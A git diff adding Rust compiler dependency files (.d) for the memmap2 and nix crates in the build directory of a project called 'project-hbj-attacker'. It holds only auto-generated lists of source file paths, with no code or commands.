diff --git a/01/project-hbj-attacker/target/debug/deps/memmap2-68530ff6c8c70627.d b/01/project-hbj-attacker/target/debug/deps/memmap2-68530ff6c8c70627.d
new file mode 100644
index 0000000..646c533
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/memmap2-68530ff6c8c70627.d
@@ -0,0 +1,7 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/memmap2-68530ff6c8c70627.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libmemmap2-68530ff6c8c70627.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/unix.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/memmap2-0.9.9/src/advice.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/nix-108c2ce175e78b93.d b/01/project-hbj-attacker/target/debug/deps/nix-108c2ce175e78b93.d
new file mode 100644
index 0000000..facb6e8
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/nix-108c2ce175e78b93.d
@@ -0,0 +1,21 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/nix-108c2ce175e78b93.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-108c2ce175e78b93.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/nix-1e5da1ae136c1959.d b/01/project-hbj-attacker/target/debug/deps/nix-1e5da1ae136c1959.d
new file mode 100644
index 0000000..c054e6b
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/nix-1e5da1ae136c1959.d
@@ -0,0 +1,20 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/nix-1e5da1ae136c1959.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rlib: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-1e5da1ae136c1959.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/nix-436eee196b17bbd6.d b/01/project-hbj-attacker/target/debug/deps/nix-436eee196b17bbd6.d
new file mode 100644
index 0000000..abb4efe
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/nix-436eee196b17bbd6.d
@@ -0,0 +1,19 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/nix-436eee196b17bbd6.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-436eee196b17bbd6.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/uio.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/nix-eafb603039cb05f6.d b/01/project-hbj-attacker/target/debug/deps/nix-eafb603039cb05f6.d
new file mode 100644
index 0000000..4109957
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/nix-eafb603039cb05f6.d
@@ -0,0 +1,13 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/nix-eafb603039cb05f6.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-eafb603039cb05f6.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:
diff --git a/01/project-hbj-attacker/target/debug/deps/nix-f71316321b63dde7.d b/01/project-hbj-attacker/target/debug/deps/nix-f71316321b63dde7.d
new file mode 100644
index 0000000..bc702e5
--- /dev/null
+++ b/01/project-hbj-attacker/target/debug/deps/nix-f71316321b63dde7.d
@@ -0,0 +1,18 @@
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/nix-f71316321b63dde7.d: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/AciteProjects/IntensiveReading/01/project-hbj-attacker/target/debug/deps/libnix-f71316321b63dde7.rmeta: /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/mod.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/ptrace/linux.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/wait.rs /home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/spawn.rs
+
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/lib.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/macros.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/errno.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/fcntl.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/mod.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/signal.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/sysinfo.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/time.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/unistd.rs:
+/home/acite/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/nix-0.30.1/src/sys/prctl.rs:
